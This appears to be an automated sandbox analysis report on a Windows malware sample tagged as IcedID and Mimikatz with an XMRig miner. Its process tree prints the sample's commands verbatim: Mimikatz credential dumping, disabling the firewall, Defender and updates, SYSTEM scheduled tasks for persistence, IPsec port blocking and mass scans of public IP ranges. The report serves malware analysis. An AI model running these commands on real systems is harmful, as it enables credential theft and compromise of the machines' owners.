Analysis

  • max time kernel
    150s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240419-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240419-enlocale:en-usos:windows10-2004-x64system
  • submitted
    03/05/2024, 05:38

General

  • Target

    2024-05-03_686cd6082713e9e29d997d69ab37d7fc_hacktools_icedid_mimikatz.exe

  • Size

    8.7MB

  • MD5

    686cd6082713e9e29d997d69ab37d7fc

  • SHA1

    fc699e2b4e7310ef47650ced478de0fb22579f76

  • SHA256

    f85fcd5beaae98c7aed141ed316e5a2ec72132a9be8ecf8c7631642b2011e172

  • SHA512

    99e5c3f742894643f23f4a7774182e7da57cdaf1d70fdcfdd0701f64b244645f14b7a023c7a26f8788206630d3d11bf1775dca90a05e7e2a66584167a02db8e0

  • SSDEEP

    196608:ylTPemknGzwHdOgEPHd9BYX/nivPlTXTYP:a3jz0E52/iv1

Malware Config

Signatures

  • Disables service(s) 3 TTPs
  • Mimikatz

    mimikatz is an open source tool to dump credentials on Windows.

  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Contacts a large (30201) amount of remote hosts 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Creates a large amount of network flows 1 TTPs

    This may indicate a network scan to discover remotely running services.

  • Detects executables containing SQL queries to confidential data stores. Observed in infostealers 2 IoCs
  • UPX dump on OEP (original entry point) 41 IoCs
  • XMRig Miner payload 12 IoCs
  • mimikatz is an open source tool to dump credentials on Windows 6 IoCs
  • Drops file in Drivers directory 3 IoCs
  • Modifies Windows Firewall 2 TTPs 2 IoCs
  • Sets file execution options in registry 2 TTPs 40 IoCs
  • Executes dropped EXE 30 IoCs
  • Loads dropped DLL 12 IoCs
  • UPX packed file 37 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Creates a Windows Service
  • Drops file in System32 directory 18 IoCs
  • Drops file in Program Files directory 3 IoCs
  • Drops file in Windows directory 60 IoCs
  • Launches sc.exe 4 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • NSIS installer 3 IoCs
  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS 45 IoCs
  • Modifies registry class 14 IoCs
  • Runs net.exe
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: LoadsDriver 15 IoCs
  • Suspicious behavior: RenamesItself 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 24 IoCs
  • Suspicious use of SetWindowsHookEx 14 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\System32\spoolsv.exe
    C:\Windows\System32\spoolsv.exe
    1⤵
      PID:2152
      • C:\Windows\TEMP\vgpardblp\iphvab.exe
        "C:\Windows\TEMP\vgpardblp\iphvab.exe"
        2⤵
        • Executes dropped EXE
        • Suspicious use of AdjustPrivilegeToken
        PID:3380
    • C:\Users\Admin\AppData\Local\Temp\2024-05-03_686cd6082713e9e29d997d69ab37d7fc_hacktools_icedid_mimikatz.exe
      "C:\Users\Admin\AppData\Local\Temp\2024-05-03_686cd6082713e9e29d997d69ab37d7fc_hacktools_icedid_mimikatz.exe"
      1⤵
      • Drops file in Windows directory
      • Suspicious behavior: RenamesItself
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4396
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\jhacitgb\tuipnsn.exe
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:428
        • C:\Windows\SysWOW64\PING.EXE
          ping 127.0.0.1 -n 5
          3⤵
          • Runs ping.exe
          PID:548
        • C:\Windows\jhacitgb\tuipnsn.exe
          C:\Windows\jhacitgb\tuipnsn.exe
          3⤵
          • Executes dropped EXE
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of SetWindowsHookEx
          PID:2316
    • C:\Windows\jhacitgb\tuipnsn.exe
      C:\Windows\jhacitgb\tuipnsn.exe
      1⤵
      • Suspicious use of NtCreateUserProcessOtherParentProcess
      • Drops file in Drivers directory
      • Sets file execution options in registry
      • Executes dropped EXE
      • Drops file in System32 directory
      • Drops file in Windows directory
      • Modifies data under HKEY_USERS
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1928
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:4296
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
          3⤵
            PID:4460
          • C:\Windows\SysWOW64\cacls.exe
            cacls C:\Windows\system32\drivers\etc\hosts /T /D users
            3⤵
              PID:1528
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
              3⤵
                PID:1000
              • C:\Windows\SysWOW64\cacls.exe
                cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                3⤵
                  PID:3212
                • C:\Windows\SysWOW64\cmd.exe
                  C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                  3⤵
                    PID:4484
                  • C:\Windows\SysWOW64\cacls.exe
                    cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                    3⤵
                      PID:3992
                  • C:\Windows\SysWOW64\netsh.exe
                    netsh ipsec static del all
                    2⤵
                      PID:2444
                    • C:\Windows\SysWOW64\netsh.exe
                      netsh ipsec static add policy name=Bastards description=FuckingBastards
                      2⤵
                        PID:3468
                      • C:\Windows\SysWOW64\netsh.exe
                        netsh ipsec static add filteraction name=BastardsList action=block
                        2⤵
                          PID:972
                        • C:\Windows\SysWOW64\cmd.exe
                          cmd /c C:\Windows\iavstblbi\tbvbtbbpb\wpcap.exe /S
                          2⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2332
                          • C:\Windows\iavstblbi\tbvbtbbpb\wpcap.exe
                            C:\Windows\iavstblbi\tbvbtbbpb\wpcap.exe /S
                            3⤵
                            • Drops file in Drivers directory
                            • Executes dropped EXE
                            • Loads dropped DLL
                            • Drops file in System32 directory
                            • Drops file in Program Files directory
                            • Suspicious use of WriteProcessMemory
                            PID:3200
                            • C:\Windows\SysWOW64\net.exe
                              net stop "Boundary Meter"
                              4⤵
                              • Suspicious use of WriteProcessMemory
                              PID:2948
                              • C:\Windows\SysWOW64\net1.exe
                                C:\Windows\system32\net1 stop "Boundary Meter"
                                5⤵
                                  PID:3648
                              • C:\Windows\SysWOW64\net.exe
                                net stop "TrueSight Meter"
                                4⤵
                                • Suspicious use of WriteProcessMemory
                                PID:4104
                                • C:\Windows\SysWOW64\net1.exe
                                  C:\Windows\system32\net1 stop "TrueSight Meter"
                                  5⤵
                                    PID:1260
                                • C:\Windows\SysWOW64\net.exe
                                  net stop npf
                                  4⤵
                                  • Suspicious use of WriteProcessMemory
                                  PID:4556
                                  • C:\Windows\SysWOW64\net1.exe
                                    C:\Windows\system32\net1 stop npf
                                    5⤵
                                      PID:2996
                                  • C:\Windows\SysWOW64\net.exe
                                    net start npf
                                    4⤵
                                      PID:1228
                                      • C:\Windows\SysWOW64\net1.exe
                                        C:\Windows\system32\net1 start npf
                                        5⤵
                                          PID:3052
                                  • C:\Windows\SysWOW64\cmd.exe
                                    cmd /c net start npf
                                    2⤵
                                      PID:4244
                                      • C:\Windows\SysWOW64\net.exe
                                        net start npf
                                        3⤵
                                          PID:412
                                          • C:\Windows\SysWOW64\net1.exe
                                            C:\Windows\system32\net1 start npf
                                            4⤵
                                              PID:2468
                                        • C:\Windows\SysWOW64\cmd.exe
                                          cmd /c net start npf
                                          2⤵
                                            PID:3672
                                            • C:\Windows\SysWOW64\net.exe
                                              net start npf
                                              3⤵
                                                PID:3892
                                                • C:\Windows\SysWOW64\net1.exe
                                                  C:\Windows\system32\net1 start npf
                                                  4⤵
                                                    PID:3528
                                              • C:\Windows\SysWOW64\cmd.exe
                                                cmd /c C:\Windows\iavstblbi\tbvbtbbpb\baiiclnlb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\iavstblbi\tbvbtbbpb\Scant.txt
                                                2⤵
                                                  PID:2608
                                                  • C:\Windows\iavstblbi\tbvbtbbpb\baiiclnlb.exe
                                                    C:\Windows\iavstblbi\tbvbtbbpb\baiiclnlb.exe -p 80 222.186.128.1-222.186.255.255 --rate=1024 -oJ C:\Windows\iavstblbi\tbvbtbbpb\Scant.txt
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Loads dropped DLL
                                                    PID:3208
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c C:\Windows\iavstblbi\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\iavstblbi\Corporate\log.txt
                                                  2⤵
                                                  • Drops file in Windows directory
                                                  PID:4084
                                                  • C:\Windows\iavstblbi\Corporate\vfshost.exe
                                                    C:\Windows\iavstblbi\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit
                                                    3⤵
                                                    • Executes dropped EXE
                                                    • Suspicious use of AdjustPrivilegeToken
                                                    PID:3896
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "zhackkbla" /ru system /tr "cmd /c C:\Windows\ime\tuipnsn.exe"
                                                  2⤵
                                                    PID:1712
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                      3⤵
                                                        PID:4004
                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                        schtasks /create /sc minute /mo 1 /tn "zhackkbla" /ru system /tr "cmd /c C:\Windows\ime\tuipnsn.exe"
                                                        3⤵
                                                        • Creates scheduled task(s)
                                                        PID:220
                                                    • C:\Windows\SysWOW64\cmd.exe
                                                      cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "itbutsnbj" /ru system /tr "cmd /c echo Y|cacls C:\Windows\jhacitgb\tuipnsn.exe /p everyone:F"
                                                      2⤵
                                                        PID:516
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                          3⤵
                                                            PID:4668
                                                          • C:\Windows\SysWOW64\schtasks.exe
                                                            schtasks /create /sc minute /mo 1 /tn "itbutsnbj" /ru system /tr "cmd /c echo Y|cacls C:\Windows\jhacitgb\tuipnsn.exe /p everyone:F"
                                                            3⤵
                                                            • Creates scheduled task(s)
                                                            PID:2736
                                                        • C:\Windows\SysWOW64\cmd.exe
                                                          cmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "dqblaezim" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\vgpardblp\iphvab.exe /p everyone:F"
                                                          2⤵
                                                            PID:3324
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                              3⤵
                                                                PID:4556
                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                schtasks /create /sc minute /mo 1 /tn "dqblaezim" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\vgpardblp\iphvab.exe /p everyone:F"
                                                                3⤵
                                                                • Creates scheduled task(s)
                                                                PID:4088
                                                            • C:\Windows\SysWOW64\netsh.exe
                                                              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=TCP
                                                              2⤵
                                                                PID:556
                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=139 protocol=UDP
                                                                2⤵
                                                                  PID:876
                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                  2⤵
                                                                    PID:2684
                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                    netsh ipsec static set policy name=Bastards assign=y
                                                                    2⤵
                                                                      PID:4472
                                                                    • C:\Windows\SysWOW64\netsh.exe
                                                                      netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=TCP
                                                                      2⤵
                                                                        PID:948
                                                                      • C:\Windows\SysWOW64\netsh.exe
                                                                        netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=135 protocol=UDP
                                                                        2⤵
                                                                          PID:4644
                                                                        • C:\Windows\SysWOW64\netsh.exe
                                                                          netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                          2⤵
                                                                            PID:3656
                                                                          • C:\Windows\SysWOW64\netsh.exe
                                                                            netsh ipsec static set policy name=Bastards assign=y
                                                                            2⤵
                                                                              PID:5024
                                                                            • C:\Windows\SysWOW64\netsh.exe
                                                                              netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=TCP
                                                                              2⤵
                                                                                PID:2616
                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                netsh ipsec static add filter filterlist=BastardsList srcaddr=any dstaddr=Me dstport=445 protocol=UDP
                                                                                2⤵
                                                                                  PID:4960
                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                  netsh ipsec static add rule name=Rule1 policy=Bastards filterlist=BastardsList filteraction=BastardsList
                                                                                  2⤵
                                                                                    PID:1708
                                                                                  • C:\Windows\SysWOW64\netsh.exe
                                                                                    netsh ipsec static set policy name=Bastards assign=y
                                                                                    2⤵
                                                                                      PID:4180
                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                      cmd /c net stop SharedAccess
                                                                                      2⤵
                                                                                        PID:468
                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                          net stop SharedAccess
                                                                                          3⤵
                                                                                            PID:3644
                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                              C:\Windows\system32\net1 stop SharedAccess
                                                                                              4⤵
                                                                                                PID:4004
                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                            cmd /c netsh firewall set opmode mode=disable
                                                                                            2⤵
                                                                                              PID:4740
                                                                                              • C:\Windows\SysWOW64\netsh.exe
                                                                                                netsh firewall set opmode mode=disable
                                                                                                3⤵
                                                                                                • Modifies Windows Firewall
                                                                                                PID:1620
                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                              cmd /c netsh Advfirewall set allprofiles state off
                                                                                              2⤵
                                                                                                PID:1672
                                                                                                • C:\Windows\SysWOW64\netsh.exe
                                                                                                  netsh Advfirewall set allprofiles state off
                                                                                                  3⤵
                                                                                                  • Modifies Windows Firewall
                                                                                                  PID:4504
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                cmd /c net stop MpsSvc
                                                                                                2⤵
                                                                                                  PID:2996
                                                                                                  • C:\Windows\SysWOW64\net.exe
                                                                                                    net stop MpsSvc
                                                                                                    3⤵
                                                                                                      PID:1528
                                                                                                      • C:\Windows\SysWOW64\net1.exe
                                                                                                        C:\Windows\system32\net1 stop MpsSvc
                                                                                                        4⤵
                                                                                                          PID:64
                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                      cmd /c net stop WinDefend
                                                                                                      2⤵
                                                                                                        PID:4556
                                                                                                        • C:\Windows\SysWOW64\net.exe
                                                                                                          net stop WinDefend
                                                                                                          3⤵
                                                                                                            PID:1680
                                                                                                            • C:\Windows\SysWOW64\net1.exe
                                                                                                              C:\Windows\system32\net1 stop WinDefend
                                                                                                              4⤵
                                                                                                                PID:3684
                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                            cmd /c net stop wuauserv
                                                                                                            2⤵
                                                                                                              PID:4492
                                                                                                              • C:\Windows\SysWOW64\net.exe
                                                                                                                net stop wuauserv
                                                                                                                3⤵
                                                                                                                  PID:3084
                                                                                                                  • C:\Windows\SysWOW64\net1.exe
                                                                                                                    C:\Windows\system32\net1 stop wuauserv
                                                                                                                    4⤵
                                                                                                                      PID:1596
                                                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                                                  cmd /c sc config MpsSvc start= disabled
                                                                                                                  2⤵
                                                                                                                    PID:2140
                                                                                                                    • C:\Windows\SysWOW64\sc.exe
                                                                                                                      sc config MpsSvc start= disabled
                                                                                                                      3⤵
                                                                                                                      • Launches sc.exe
                                                                                                                      PID:2456
                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                    cmd /c sc config SharedAccess start= disabled
                                                                                                                    2⤵
                                                                                                                      PID:1904
                                                                                                                      • C:\Windows\SysWOW64\sc.exe
                                                                                                                        sc config SharedAccess start= disabled
                                                                                                                        3⤵
                                                                                                                        • Launches sc.exe
                                                                                                                        PID:2440
                                                                                                                    • C:\Windows\SysWOW64\cmd.exe
                                                                                                                      cmd /c sc config WinDefend start= disabled
                                                                                                                      2⤵
                                                                                                                        PID:1976
                                                                                                                        • C:\Windows\SysWOW64\sc.exe
                                                                                                                          sc config WinDefend start= disabled
                                                                                                                          3⤵
                                                                                                                          • Launches sc.exe
                                                                                                                          PID:2468
                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                        cmd /c sc config wuauserv start= disabled
                                                                                                                        2⤵
                                                                                                                          PID:1388
                                                                                                                          • C:\Windows\SysWOW64\sc.exe
                                                                                                                            sc config wuauserv start= disabled
                                                                                                                            3⤵
                                                                                                                            • Launches sc.exe
                                                                                                                            PID:3052
                                                                                                                        • C:\Windows\TEMP\iavstblbi\lnahbingb.exe
                                                                                                                          C:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 780 C:\Windows\TEMP\iavstblbi\780.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:1424
                                                                                                                        • C:\Windows\TEMP\xohudmc.exe
                                                                                                                          C:\Windows\TEMP\xohudmc.exe
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Drops file in System32 directory
                                                                                                                          • Suspicious use of SetWindowsHookEx
                                                                                                                          PID:5032
                                                                                                                        • C:\Windows\TEMP\iavstblbi\lnahbingb.exe
                                                                                                                          C:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 384 C:\Windows\TEMP\iavstblbi\384.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:408
                                                                                                                        • C:\Windows\TEMP\iavstblbi\lnahbingb.exe
                                                                                                                          C:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 2152 C:\Windows\TEMP\iavstblbi\2152.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:1388
                                                                                                                        • C:\Windows\TEMP\iavstblbi\lnahbingb.exe
                                                                                                                          C:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 2652 C:\Windows\TEMP\iavstblbi\2652.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:1260
                                                                                                                        • C:\Windows\TEMP\iavstblbi\lnahbingb.exe
                                                                                                                          C:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 2796 C:\Windows\TEMP\iavstblbi\2796.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:4128
                                                                                                                        • C:\Windows\TEMP\iavstblbi\lnahbingb.exe
                                                                                                                          C:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 2836 C:\Windows\TEMP\iavstblbi\2836.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:3252
                                                                                                                        • C:\Windows\TEMP\iavstblbi\lnahbingb.exe
                                                                                                                          C:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 1064 C:\Windows\TEMP\iavstblbi\1064.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:456
                                                                                                                        • C:\Windows\TEMP\iavstblbi\lnahbingb.exe
                                                                                                                          C:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 3780 C:\Windows\TEMP\iavstblbi\3780.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:4436
                                                                                                                        • C:\Windows\TEMP\iavstblbi\lnahbingb.exe
                                                                                                                          C:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 3876 C:\Windows\TEMP\iavstblbi\3876.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:2192
                                                                                                                        • C:\Windows\TEMP\iavstblbi\lnahbingb.exe
                                                                                                                          C:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 3940 C:\Windows\TEMP\iavstblbi\3940.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:4572
                                                                                                                        • C:\Windows\TEMP\iavstblbi\lnahbingb.exe
                                                                                                                          C:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 4016 C:\Windows\TEMP\iavstblbi\4016.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:4588
                                                                                                                        • C:\Windows\TEMP\iavstblbi\lnahbingb.exe
                                                                                                                          C:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 4808 C:\Windows\TEMP\iavstblbi\4808.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:2736
                                                                                                                        • C:\Windows\TEMP\iavstblbi\lnahbingb.exe
                                                                                                                          C:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 1740 C:\Windows\TEMP\iavstblbi\1740.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:4396
                                                                                                                        • C:\Windows\TEMP\iavstblbi\lnahbingb.exe
                                                                                                                          C:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 4880 C:\Windows\TEMP\iavstblbi\4880.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:3644
                                                                                                                        • C:\Windows\TEMP\iavstblbi\lnahbingb.exe
                                                                                                                          C:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 2988 C:\Windows\TEMP\iavstblbi\2988.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:4748
                                                                                                                        • C:\Windows\TEMP\iavstblbi\lnahbingb.exe
                                                                                                                          C:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 2212 C:\Windows\TEMP\iavstblbi\2212.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:4940
                                                                                                                        • C:\Windows\TEMP\iavstblbi\lnahbingb.exe
                                                                                                                          C:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 2216 C:\Windows\TEMP\iavstblbi\2216.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:5000
                                                                                                                        • C:\Windows\TEMP\iavstblbi\lnahbingb.exe
                                                                                                                          C:\Windows\TEMP\iavstblbi\lnahbingb.exe -accepteula -mp 2708 C:\Windows\TEMP\iavstblbi\2708.dmp
                                                                                                                          2⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Modifies data under HKEY_USERS
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:3676
                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                          cmd.exe /c C:\Windows\iavstblbi\tbvbtbbpb\scan.bat
                                                                                                                          2⤵
                                                                                                                            PID:3172
                                                                                                                            • C:\Windows\iavstblbi\tbvbtbbpb\kbvlbvznc.exe
                                                                                                                              kbvlbvznc.exe TCP 191.101.0.1 191.101.255.255 7001 512 /save
                                                                                                                              3⤵
                                                                                                                              • Executes dropped EXE
                                                                                                                              • Drops file in Windows directory
                                                                                                                              PID:3384
                                                                                                                          • C:\Windows\SysWOW64\cmd.exe
                                                                                                                            cmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                                                                            2⤵
                                                                                                                              PID:60
                                                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                3⤵
                                                                                                                                  PID:5316
                                                                                                                                • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                  cacls C:\Windows\system32\drivers\etc\hosts /T /D users
                                                                                                                                  3⤵
                                                                                                                                    PID:4416
                                                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                    C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                    3⤵
                                                                                                                                      PID:6040
                                                                                                                                    • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                      cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators
                                                                                                                                      3⤵
                                                                                                                                        PID:5428
                                                                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                        3⤵
                                                                                                                                          PID:5172
                                                                                                                                        • C:\Windows\SysWOW64\cacls.exe
                                                                                                                                          cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM
                                                                                                                                          3⤵
                                                                                                                                            PID:5788
                                                                                                                                      • C:\Windows\SysWOW64\pufbqc.exe
                                                                                                                                        C:\Windows\SysWOW64\pufbqc.exe
                                                                                                                                        1⤵
                                                                                                                                        • Executes dropped EXE
                                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                                        PID:4188
                                                                                                                                      • C:\Windows\system32\cmd.EXE
                                                                                                                                        C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\jhacitgb\tuipnsn.exe /p everyone:F
                                                                                                                                        1⤵
                                                                                                                                          PID:3132
                                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                                            C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                                                                                                                                            2⤵
                                                                                                                                              PID:3264
                                                                                                                                            • C:\Windows\system32\cacls.exe
                                                                                                                                              cacls C:\Windows\jhacitgb\tuipnsn.exe /p everyone:F
                                                                                                                                              2⤵
                                                                                                                                                PID:3568
                                                                                                                                            • C:\Windows\system32\cmd.EXE
                                                                                                                                              C:\Windows\system32\cmd.EXE /c C:\Windows\ime\tuipnsn.exe
                                                                                                                                              1⤵
                                                                                                                                                PID:2608
                                                                                                                                                • C:\Windows\ime\tuipnsn.exe
                                                                                                                                                  C:\Windows\ime\tuipnsn.exe
                                                                                                                                                  2⤵
                                                                                                                                                  • Executes dropped EXE
                                                                                                                                                  • Suspicious use of SetWindowsHookEx
                                                                                                                                                  PID:1632
                                                                                                                                              • C:\Windows\system32\cmd.EXE
                                                                                                                                                C:\Windows\system32\cmd.EXE /c echo Y|cacls C:\Windows\TEMP\vgpardblp\iphvab.exe /p everyone:F
                                                                                                                                                1⤵
                                                                                                                                                  PID:2428
                                                                                                                                                  • C:\Windows\system32\cmd.exe
